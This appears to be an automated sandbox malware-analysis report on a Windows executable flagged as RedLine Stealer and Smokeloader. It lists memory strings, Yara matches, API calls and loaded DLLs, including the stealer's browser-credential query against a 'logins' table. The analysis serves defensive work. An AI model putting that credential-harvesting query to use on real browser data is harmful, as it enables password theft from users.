Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: NK3SASJheq.exe, NK3SASJheq.exe, 00000000.00000002.1867943273.000000006CC2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: NK3SASJheq.exe, 00000000.00000002.1867602286.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, HCAFIJDG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: NK3SASJheq.exe, 00000000.00000002.1860968846.00000000270CB000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: NK3SASJheq.exe, 00000000.00000002.1860968846.00000000270CB000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: HCAFIJDG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, HCAFIJDG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, HCAFIJDG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NK3SASJheq.exe, 00000000.00000002.1860968846.00000000270CB000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: NK3SASJheq.exe, 00000000.00000002.1860968846.00000000270CB000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: HCAFIJDG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HCAFIJDG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HCAFIJDG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://support.mozilla.org
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: NK3SASJheq.exe, 00000000.00000002.1860968846.00000000270CB000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: NK3SASJheq.exe, 00000000.00000002.1836423523.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, HCAFIJDG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: HCAFIJDG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NK3SASJheq.exe, 00000000.00000002.1860968846.00000000270CB000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHI.0.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://www.mozilla.org
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: NK3SASJheq.exe, 00000000.00000003.1687707943.000000002D15B000.00000004.00000020.00020000.00000000.sdmp, CFBFCGIDAKECGCBGDBAFIDHCFB.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1836330241.000000000098E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1836780262.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC1B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CC1B700
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC1B8C0 rand_s,NtQueryVirtualMemory, 0_2_6CC1B8C0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC1B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6CC1B910
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6CBBF280
Detected potential crypto function
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBB35A0 0_2_6CBB35A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBC6C80 0_2_6CBC6C80
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF6CF0 0_2_6CBF6CF0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBD4E0 0_2_6CBBD4E0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC134A0 0_2_6CC134A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC1C4A0 0_2_6CC1C4A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBDD4D0 0_2_6CBDD4D0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBC64C0 0_2_6CBC64C0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC2545C 0_2_6CC2545C
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF5C10 0_2_6CBF5C10
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC2AC00 0_2_6CC2AC00
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC02C10 0_2_6CC02C10
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC2542B 0_2_6CC2542B
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBC5440 0_2_6CBC5440
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC185F0 0_2_6CC185F0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF0DD0 0_2_6CBF0DD0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBE0512 0_2_6CBE0512
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBDED10 0_2_6CBDED10
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBCFD00 0_2_6CBCFD00
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC276E3 0_2_6CC276E3
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBD5E90 0_2_6CBD5E90
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC1E680 0_2_6CC1E680
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBBEF0 0_2_6CBBBEF0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBCFEF0 0_2_6CBCFEF0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC14EA0 0_2_6CC14EA0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC02E4E 0_2_6CC02E4E
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC26E63 0_2_6CC26E63
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF7E10 0_2_6CBF7E10
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC05600 0_2_6CC05600
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBC670 0_2_6CBBC670
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBD9E50 0_2_6CBD9E50
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF3E50 0_2_6CBF3E50
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC19E30 0_2_6CC19E30
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBD4640 0_2_6CBD4640
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBE6FF0 0_2_6CBE6FF0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBDFE0 0_2_6CBBDFE0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC077A0 0_2_6CC077A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF7710 0_2_6CBF7710
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBC9F00 0_2_6CBC9F00
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC250C7 0_2_6CC250C7
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBE60A0 0_2_6CBE60A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBDC0E0 0_2_6CBDC0E0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF58E0 0_2_6CBF58E0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBFB820 0_2_6CBFB820
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBC7810 0_2_6CBC7810
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBFF070 0_2_6CBFF070
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC04820 0_2_6CC04820
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBD8850 0_2_6CBD8850
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBDD850 0_2_6CBDD850
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBED9B0 0_2_6CBED9B0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBC9A0 0_2_6CBBC9A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF5190 0_2_6CBF5190
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC12990 0_2_6CC12990
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC0B970 0_2_6CC0B970
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC2B170 0_2_6CC2B170
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBCD960 0_2_6CBCD960
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBDA940 0_2_6CBDA940
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBCCAB0 0_2_6CBCCAB0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBB22A0 0_2_6CBB22A0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBE4AA0 0_2_6CBE4AA0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBD1AF0 0_2_6CBD1AF0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBFE2F0 0_2_6CBFE2F0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC2BA90 0_2_6CC2BA90
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC22AB0 0_2_6CC22AB0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF8AC0 0_2_6CBF8AC0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBF9A60 0_2_6CBF9A60
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC253C8 0_2_6CC253C8
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBBF380 0_2_6CBBF380
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBFD320 0_2_6CBFD320
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBCC370 0_2_6CBCC370
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CBB5340 0_2_6CBB5340
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC5ECC0 0_2_6CC5ECC0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CCBECD0 0_2_6CCBECD0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC6AC60 0_2_6CC6AC60
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD26C00 0_2_6CD26C00
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD3AC30 0_2_6CD3AC30
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CDECDC0 0_2_6CDECDC0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CCF6D90 0_2_6CCF6D90
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC64DB0 0_2_6CC64DB0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD8AD50 0_2_6CD8AD50
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD2ED70 0_2_6CD2ED70
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CDE8D20 0_2_6CDE8D20
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC6AEC0 0_2_6CC6AEC0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD00EC0 0_2_6CD00EC0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CCE6E90 0_2_6CCE6E90
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CCFEE70 0_2_6CCFEE70
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD40E20 0_2_6CD40E20
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CD3EFF0 0_2_6CD3EFF0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC60FE0 0_2_6CC60FE0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CDA8FB0 0_2_6CDA8FB0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC6EFB0 0_2_6CC6EFB0
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CCCEF40 0_2_6CCCEF40
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: String function: 6CBF94D0 appears 90 times
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: String function: 6CBECBE8 appears 134 times
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: String function: 004045C0 appears 317 times
One or more processes crash
Source: C:\Users\user\Desktop\NK3SASJheq.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 2336
Sample file is different than original file name gathered from version info
Source: NK3SASJheq.exe, 00000000.00000002.1868009205.000000006CC42000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs NK3SASJheq.exe
Source: NK3SASJheq.exe, 00000000.00000002.1868449964.000000006CE35000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs NK3SASJheq.exe
Uses 32bit PE files
Source: NK3SASJheq.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000002.1836330241.000000000098E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1836780262.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: NK3SASJheq.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/44@0/1
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_6CC17030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CC17030
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00418680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00418680
Source: C:\Users\user\Desktop\NK3SASJheq.exe Code function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00413720
Source: C:\Users\user\Desktop\NK3SASJheq.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\DKVY7QUA.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess636
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\fc624c17-b3eb-45b4-b89c-5c12bd3db2ae Jump to behavior
Source: NK3SASJheq.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NK3SASJheq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: NK3SASJheq.exe, 00000000.00000002.1836180792.000000000097E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;PL4
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: NK3SASJheq.exe, NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: NK3SASJheq.exe, 00000000.00000002.1868312377.000000006CDEF000.00000002.00000001.01000000.00000007.sdmp, NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: NK3SASJheq.exe, 00000000.00000003.1594855141.0000000020FD9000.00000004.00000020.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000003.1607321436.0000000020FF5000.00000004.00000020.00020000.00000000.sdmp, BFHJECAAAFHIJKFIJEGC.0.dr, EBAAAFBGDBKKEBGCFCBF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: NK3SASJheq.exe, 00000000.00000002.1867490629.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, NK3SASJheq.exe, 00000000.00000002.1854926659.000000001AF1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: NK3SASJheq.exe ReversingLabs: Detection: 63%
Source: NK3SASJheq.exe Virustotal: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\NK3SASJheq.exe "C:\Users\user\Desktop\NK3SASJheq.exe"
Source: C:\Users\user\Desktop\NK3SASJheq.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 636 -s 2336
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\NK3SASJheq.exe Section loaded: wininet.dll Jump to behavior
